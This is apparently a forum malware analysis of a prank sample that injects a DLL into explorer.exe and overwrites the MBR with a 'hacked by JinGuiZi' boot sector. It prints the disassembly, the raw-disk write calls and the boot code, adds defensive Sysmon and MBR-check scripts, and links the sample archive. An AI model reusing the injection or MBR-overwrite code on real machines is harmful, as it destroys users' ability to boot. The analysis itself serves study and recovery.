00401386  |.  33C0          xor eax,eax
00401388  |.  F2:AE         repne scas byte ptr es:[edi]
0040138A  |.  F7D1          not ecx
0040138C  |.  49            dec ecx
0040138D  |.  6A 00         push 0x0                                 ; /pBytesWritten = NULL
0040138F  |.  51            push ecx                                 ; |BytesToWrite
00401390  |.  53            push ebx                                 ; |Buffer
00401391  |.  55            push ebp                                 ; |Address
00401392  |.  56            push esi                                 ; |hProcess
00401393  |.  FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProce>; \WriteProcessMemory
00401399  |.  8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLib>;  kernel32.LoadLibraryA
0040139F  |.  6A 00         push 0x0                                 ; /lpThreadId = NULL
004013A1  |.  6A 00         push 0x0                                 ; |dwCreationFlags = 0
004013A3  |.  55            push ebp                                 ; |lpParameter
004013A4  |.  51            push ecx                                 ; |lpStartAddress => kernel32.LoadLibraryA
004013A5  |.  6A 00         push 0x0                                 ; |dwStackSize = 0
004013A7  |.  6A 00         push 0x0                                 ; |lpThreadAttributes
004013A9  |.  56            push esi                                 ; |hProcess
004013AA  |.  FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemo>; \CreateRemoteThread
004013B0  |.  8BF8          mov edi,eax
004013B2  |.  6A FF         push -0x1                                ; /Timeout = INFINITE
004013B4  |.  57            push edi                                 ; |hObject
004013B5  |.  FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSin>; \WaitForSingleObject
004013BB  |.  68 00800000   push 0x8000                              ; /dwFreeType = 8000 (32768.)
004013C0  |.  6A 00         push 0x0                                 ; |dwSize = 0
004013C2  |.  55            push ebp                                 ; |lpAddress
004013C3  |.  56            push esi                                 ; |hProcess
004013C4  |.  FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFre>; \VirtualFreeEx
004013CA  |.  56            push esi                                 ; /hObject
004013CB  |.  8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHa>; |kernel32.CloseHandle
004013D1  |.  FFD6          call esi                                 ; \CloseHandle
004013D3  |.  57            push edi                                 ; /hObject
004013D4  |.  FFD6          call esi                                 ; \CloseHandle
004013D6  |.  5F            pop edi
004013D7  |.  5E            pop esi
004013D8  |.  5D            pop ebp
004013D9  |.  5B            pop ebx
004013DA  |.  81C4 28010000 add esp,0x128
004013E0  \.  C3            retn
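The tail of the function above is the textbook DLL-injection sequence: the DLL path is written into the target with WriteProcessMemory, CreateRemoteThread is started with kernel32.LoadLibraryA as its start address and the path as its parameter, the thread is awaited, and the buffer is freed with VirtualFreeEx. On a monitored host this leaves a very recognisable trace: a CreateRemoteThread event whose start function is a LoadLibrary export. The following is an added example, not code from the post or from the sample, that runs such a check over a few constructed, simplified Sysmon Event ID 8 records written as key=value lines (only the field names SourceImage, TargetImage, StartModule and StartFunction follow Sysmon's schema; the images and paths are made up):

```python
import re
from typing import Dict, List

# Constructed, simplified Sysmon Event ID 8 (CreateRemoteThread) records in
# key=value form. Real events are XML inside EVTX; only the field names
# (SourceImage, TargetImage, StartModule, StartFunction) follow Sysmon's schema.
# The images, paths and the trailing non-thread event are made up.
SAMPLE_EVENTS = [
    "EventID=8 SourceImage=C:\\Users\\lab\\Desktop\\OhMyGod.exe "
    "TargetImage=C:\\Windows\\explorer.exe "
    "StartModule=C:\\Windows\\System32\\kernel32.dll StartFunction=LoadLibraryA",
    "EventID=8 SourceImage=C:\\Tools\\dbg.exe "
    "TargetImage=C:\\Users\\lab\\app.exe "
    "StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=DbgUiRemoteBreakin",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe",
]

# LoadLibrary variants an injector hands to CreateRemoteThread as the thread
# start address, and the modules that export them.
LOADER_FUNCTIONS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
LOADER_MODULES = ("kernel32.dll", "kernelbase.dll")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict (values contain no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_loadlibrary_thread(event: Dict[str, str]) -> bool:
    """True for a CreateRemoteThread event whose entry point is a LoadLibrary export."""
    if event.get("EventID") != "8":
        return False
    module = event.get("StartModule", "").lower()
    return module.endswith(LOADER_MODULES) and event.get("StartFunction") in LOADER_FUNCTIONS


def detect_injections(lines: List[str]) -> List[Dict[str, str]]:
    """Collect the events that match the remote LoadLibrary-thread pattern."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_loadlibrary_thread(event):
            hits.append({
                "source": event.get("SourceImage", "?"),
                "target": event.get("TargetImage", "?"),
                "function": event["StartFunction"],
            })
    return hits


if __name__ == "__main__":
    for hit in detect_injections(SAMPLE_EVENTS):
        print(f"DLL injection: {hit['source']} -> {hit['target']} via {hit['function']}")
```

The second record (a debugger attach, whose remote thread starts at ntdll!DbgUiRemoteBreakin) is deliberately included so the rule does not fire on every CreateRemoteThread; in practice the source image and the target (explorer.exe here) are what an analyst triages next.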
 
Now look at the last call:   004017E5  |.  E8 B6FCFFFF   call OhMyGod.004014A0
It queries the Windows version with GetVersionExA and then forces a reboot through ExitWindowsEx(EWX_REBOOT|EWX_FORCE); since the MBR has already been maliciously overwritten by then, the machine can no longer boot into the system.
004014A0  /8B4424 04     mov eax,dword ptr ss:[esp+0x4]
004014A4  |.  81EC 94000000 sub esp,0x94
004014AA  |.  85C0          test eax,eax
004014AC  |.  74 13         je XOhMyGod.004014C1
004014AE  |.  83F8 02       cmp eax,0x2
004014B1  |.  74 0E         je XOhMyGod.004014C1
004014B3  |.  83F8 01       cmp eax,0x1
004014B6  |.  74 09         je XOhMyGod.004014C1
004014B8  |.  33C0          xor eax,eax
004014BA  |.  81C4 94000000 add esp,0x94
004014C0  |.  C3            retn
004014C1  |>  57            push edi
004014C2  |.  B9 24000000   mov ecx,0x24
004014C7  |.  33C0          xor eax,eax
004014C9  |.  8D7C24 08     lea edi,dword ptr ss:[esp+0x8]
004014CD  |.  F3:AB         rep stos dword ptr es:[edi]
004014CF  |.  8D4424 04     lea eax,dword ptr ss:[esp+0x4]
004014D3  |.  C74424 04 940>mov dword ptr ss:[esp+0x4],0x94
004014DB  |.  50            push eax                                 ; /pVersionInformation
004014DC  |.  FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
004014E2  |.  85C0          test eax,eax
004014E4  |.  5F            pop edi
004014E5  |.  75 07         jnz XOhMyGod.004014EE
004014E7  |.  81C4 94000000 add esp,0x94
004014ED  |.  C3            retn
004014EE  |>  837C24 10 02  cmp dword ptr ss:[esp+0x10],0x2
004014F3  |.  75 05         jnz XOhMyGod.004014FA
004014F5  |.  E8 F6FEFFFF   call OhMyGod.004013F0
004014FA  |>  6A 00         push 0x0                                 ; /Reserved = 0
004014FC  |.  6A 06         push 0x6                                 ; |Options = EWX_REBOOT|EWX_FORCE
004014FE  |.  FF15 54814000 call dword ptr ds:[<&USER32.ExitWindowsE>; \ExitWindowsEx
00401504  |.  81C4 94000000 add esp,0x94
0040150A  \.  C3            retn
 
Before looking at the MBR, let's take a static look at that DLL in IDA.
It contains only one function, DllMain, which looks like this:
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
 
Now we dump the MBR with WinHex and analyze it statically in IDA; for a detailed introduction to the MBR, see willJ's MBR study thread.
;org 7C00h
seg000:7C00                                         assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 B8 12 00                                mov     ax, 12h         ; set the video mode; 12h = 640x480, 16 colours
seg000:7C03 CD 10                                   int     10h             ; - VIDEO - SET VIDEO MODE
seg000:7C03                                                                 ; AL = mode
seg000:7C05 BD 18 7C                                mov     bp, 7C18h       ; es:bp = address of the string
seg000:7C08 B9 13 00                                mov     cx, 13h         ; length of the string to display, 0x13
seg000:7C0B B8 01 13                                mov     ax, 1301h       ; ah = 13h, al = 01h: int 10h function 13h (write string in teletype mode)
seg000:7C0E BB 0C 00                                mov     bx, 0Ch         ; bl = 0Ch: attribute, black background with light red text
seg000:7C11 BA 00 00                                mov     dx, 0           ; dh = 0, dl = 0: row 0, column 0
seg000:7C14 CD 10                                   int     10h             ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14                                                                 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14                                                                 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14                                                                 ; ES:BP -> start of string
seg000:7C14                         ; ---------------------------------------------------------------------------
seg000:7C16 E2 FE                                   loop    loc_7C16        ; infinite loop
seg000:7C16                         ; ---------------------------------------------------------------------------
seg000:7C18 68 61 63 6B 65 64 20 62+aHackedByJingui db 'hacked by JinGuiZi      ' ; the string to display
 
The last two bytes of the MBR are 0x55 0xAA:
seg000:7DFE 55                                      db  55h ; U
seg000:7DFF AA                                      db 0AAh ;
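To make the sector layout concrete, here is an added example (not code from the post, from the sample or from willJ's thread) that parses a 512-byte boot sector, validates the 0x55AA signature and the partition table, and flags the two things that stand out in the listing above: an empty partition table and boot code that parks the CPU in a `loop $`/`jmp $` right after the BIOS video calls. The infected sector is rebuilt inline from the bytes in the listing (the trailing spaces of the string are taken from IDA's output; the padding up to the signature is assumed to be zeros), and the benign sector is a constructed placeholder with one NTFS partition entry. The `compare_to_backup` helper shows the check an analyst runs against a saved copy of the sector when recovering a machine:

```python
import re
import struct

SECTOR_SIZE = 512
PT_OFFSET = 446           # the four 16-byte partition entries start here
BOOT_SIG = b"\x55\xAA"    # boot signature in bytes 510..511

# Constructed copy of the infected sector from the listing: the 24 bytes of
# boot code, the displayed string (trailing spaces as shown by IDA), zero
# padding (assumed) and the 0x55AA signature. Not a dump of a real disk.
MALICIOUS_MBR = (
    bytes.fromhex("B81200CD10BD187CB91300B80113BB0C00BA0000CD10E2FE")
    + b"hacked by JinGuiZi      "
).ljust(510, b"\x00") + BOOT_SIG

# Constructed benign sector: a placeholder boot-code stub plus one active
# NTFS partition entry (type 0x07, starting at LBA 2048, 0x100000 sectors).
BENIGN_MBR = (
    b"\x33\xC0\x8E\xD0\xBC\x00\x7C".ljust(PT_OFFSET, b"\x00")
    + struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 0x100000)
    + b"\x00" * 48
    + BOOT_SIG
)


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte sector into boot code, partition table and signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        raw = sector[PT_OFFSET + 16 * i: PT_OFFSET + 16 * (i + 1)]
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack("<B3sB3sII", raw)
        partitions.append({"status": status, "type": ptype, "lba": lba, "sectors": count})
    return {
        "boot_code": sector[:PT_OFFSET],
        "partitions": partitions,
        "signature_ok": sector[510:512] == BOOT_SIG,
    }


def assess_mbr(sector: bytes):
    """Return (findings, strings): heuristic findings plus printable strings in the boot code."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    used = [p for p in info["partitions"] if p["type"] != 0 and p["sectors"] != 0]
    if not used:
        findings.append("partition table is empty: no OS partition to boot from")
    if any(p["status"] not in (0x00, 0x80) for p in info["partitions"]):
        findings.append("partition entry with an invalid status byte")
    # A real boot loader reads the partition table and loads a VBR; code that
    # parks the CPU in `loop $` (E2 FE) or `jmp $` (EB FE) within its first
    # few dozen bytes only exists to show a message and hang the machine.
    head = info["boot_code"][:64]
    if b"\xE2\xFE" in head or b"\xEB\xFE" in head:
        findings.append("boot code halts in a tight loop within its first 64 bytes")
    strings = [s.decode("ascii").strip() for s in re.findall(rb"[ -~]{8,}", info["boot_code"])]
    return findings, strings


def compare_to_backup(sector: bytes, backup: bytes) -> list:
    """Name the regions of `sector` that differ from a known-good `backup`."""
    regions = {"boot_code": (0, PT_OFFSET), "partition_table": (PT_OFFSET, 510), "signature": (510, 512)}
    return [name for name, (lo, hi) in regions.items() if sector[lo:hi] != backup[lo:hi]]


if __name__ == "__main__":
    for label, sector in (("infected", MALICIOUS_MBR), ("benign", BENIGN_MBR)):
        findings, strings = assess_mbr(sector)
        print(label, findings, strings)
    print("regions differing from backup:", compare_to_backup(MALICIOUS_MBR, BENIGN_MBR))
```

On a live Windows machine the 512 bytes would be read as an administrator from \\.\PhysicalDrive0, the same path the DLL opens for writing; keeping a copy of that sector before an incident is what makes `compare_to_backup` useful during recovery, since the partition table in a fresh dump will be the part that is gone.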




Finally, the effect (the original post shows two screenshots here, both captioned "Result"):

Prevention and recovery
For MBR recovery, see willJ's post: http://www.52pojie.cn/thread-188123-1-1.html
Delete GuiZi.exe from the system directory and the rand().dll from the Windows directory.
Restore the registry changes.

Attachments:
一个简单的恶意代码分析.doc (181.5 KB, downloads: 37)

OhMyGod.7z (54.78 KB, downloads: 68)   password "52pojie"

MBR_Jin.7z (187 Bytes, downloads: 37)

PS: works on XP, fails on Win7.

Summary: the sample's method is to create a DLL and inject it into explorer, the ever-present desktop process; once the user interacts with the desktop the DLL is loaded and writes to the MBR. It resolves the address of MessageBoxA dynamically in shellcode style (by reading the import table), which is fairly stealthy, although it does nothing against dynamic debugging; it is a form of API hooking and a technique worth learning. Everything else appears to be decoy noise that we can ignore.






Ratings (3 participants: prestige +1, helpfulness +3)
willJ  +1 prestige, +1 helpfulness: Nice analysis; clearly you have studied the MBR in depth.
yy281566609  +1: Respect to teacher JoyChou...
Thend  +1: Teacher JoyChou is really impressive; a beginner learned something.

a826463749 posted on 2013-7-11 11:34
Learning it step by step
wuaixuexi posted on 2013-7-11 11:35
OP, your function analysis is very thorough and you clearly know assembly well; you have my support
No_what_can't posted on 2013-7-11 11:44
逍遥枷锁 posted on 2013-7-11 11:51
Nobody should use this to do anything bad; the consequences would be serious

Comments

AV would kill it anyway, haha  posted on 2013-7-11 11:58
这只猪 posted on 2013-7-11 11:55
Pure admiration and support; what a solid understanding of assembly...

Comments

Reading it slowly  posted on 2013-7-11 11:57
逍遥枷锁 posted on 2013-7-11 12:42
If this were opened by someone who knows nothing about computers, they would think the machine was broken and pay to have it repaired; very sad.
willJ posted on 2013-7-11 20:49
Was this sample written by JinGuiZi (金龟子)?
What is the purpose of those registry and service operations?
Is the whole sample just a prank? What is the goal?
 OP | JoyChou posted on 2013-7-11 20:55
willJ posted on 2013-7-11 20:49
Was this sample written by JinGuiZi (金龟子)?
What is the purpose of those registry and service operations?
Is the whole sample just a prank? What is the goal?

Yes, a prank. The registry and service stuff all seems to be there just to confuse.
 OP | JoyChou posted on 2013-7-11 22:32
wuaixuexi posted on 2013-7-11 11:35
OP, your function analysis is very thorough and you clearly know assembly well; you have my support

Let's keep at it together